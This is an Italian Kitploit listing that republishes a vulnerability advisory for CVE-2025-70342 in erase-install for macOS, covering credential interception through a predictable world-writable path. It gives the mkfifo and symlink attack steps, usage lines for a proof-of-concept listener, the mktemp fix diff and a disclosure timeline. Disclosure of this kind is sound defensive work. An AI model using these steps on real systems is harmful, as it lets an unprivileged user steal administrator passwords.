Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-70342 — CVE-2025-70342: Intercettazione delle credenziali tramite Named Pipe in erase-install | Kitploit
Strumenti/GitHubGitHub/malvector/cve-2025-70342
Escalation di PrivilegiAnalisi delle VulnerabilitàExploit
GitHubmalvector/cve-2025-70342

CVE-2025-70342

CVE-2025-70342: Intercettazione delle credenziali tramite Named Pipe in erase-install

Vedi Repository
5 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-70342: Intercettazione delle credenziali tramite Named Pipe in erase-install

Riepilogo

erase-install antecedente alla v40.4 (commit 2c31239) scrive l'output delle credenziali di swiftDialog in un percorso hardcoded /var/tmp/dialog.json. Su Mac Apple Silicon, le credenziali di amministrazione inserite durante le operazioni di reinstall/erase vengono scritte in questa posizione prevedibile e scrivibile da chiunque. Un utente malintenzionato locale non privilegiato può creare una named pipe (FIFO) in questo percorso per intercettare le credenziali di amministrazione in tempo reale.

Versioni Affette

  • Vulnerabile: erase-install <= 40.4
  • Corretto: commit 2c31239 (dopo PR #574)

CVSS 3.1

Punteggio: 7.1 (Alto)

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Dettagli della Vulnerabilità

Percorso di Output delle Credenziali Hardcoded (CWE-732)

File: erase-install.sh

Riga 72:

root@kitploit:~
dialog_output="/var/tmp/dialog.json"

Riga 124:

root@kitploit:~
"$dialog_bin" "${dialog_args[@]}" ... 2>/dev/null > "$dialog_output"

Su Mac Apple Silicon, erase-install chiede all'amministratore le credenziali tramite swiftDialog. Le credenziali (nome utente + password) vengono scritte tramite reindirizzamento shell in /var/tmp/dialog.json - un percorso hardcoded in una directory scrivibile da chiunque. Lo script non verifica se questo percorso sia stato manomesso prima di scrivere.

Scenario di Attacco

root@kitploit:~
1. Unprivileged attacker creates a named pipe (FIFO): mkfifo /tmp/.fifo
2. Attacker creates symlink: ln -s /tmp/.fifo /var/tmp/dialog.json
3. Attacker reads from FIFO (blocks, waiting for data)
4. Admin runs: sudo erase-install.sh --erase
5. Admin enters credentials in swiftDialog prompt
6. Credentials flow through symlink → FIFO → attacker's terminal

Questo attacco non richiede tempistiche particolari o condizioni di gara - l'attaccante si limita a piazzare il symlink e attendere.

Prova di Concetto

Prerequisiti

  • Mac Apple Silicon (il prompt per le credenziali viene attivato solo su arm64)
  • Qualsiasi account utente locale non privilegiato

Utilizzo

root@kitploit:~
# Start the listener (as unprivileged user)
python3 poc.py

# Wait for admin to run erase-install with --erase or --reinstall
# Credentials will be printed to stdout when captured

# Cleanup
python3 poc.py --cleanup

Vedere poc.py per i dettagli completi.

Rimedio

  • Aggiornare erase-install alla versione contenente il commit 2c31239 o successiva
  • La correzione utilizza mktemp per generare un nome file casuale, impedendo la previsione del percorso:
root@kitploit:~
- dialog_output="/var/tmp/dialog.json"
+ dialog_output=$(/usr/bin/mktemp /var/tmp/dialog.XXX.json)

Cronologia

DataEvento
2025-12-23Vulnerabilità scoperta
2025-12-23Segnalata al manutentore
2025-12-24Correzione integrata tramite PR #574

Crediti

  • cooldadhacking (GitHub)

Riferimenti

  • erase-install PR #574
  • Fix commit 2c31239

Dichiarazione di non responsabilità

Questa prova di concetto è fornita esclusivamente a scopo educativo e per test di sicurezza autorizzati. Utilizzare responsabilmente e solo su sistemi di cui si è proprietari o per i quali si ha esplicita autorizzazione.

Scarica lo strumento
MetricaValore
Vettore d'attaccoLocale
Complessità d'attaccoBassa
Privilegi richiestiBassi
Interazione utenteRichiesta (l'admin inserisce le credenziali)
ScopeInvariato
RiservatezzaAlta
IntegritàAlta
DisponibilitàNessuna
2026-02-20
CVE-2025-70342 assegnato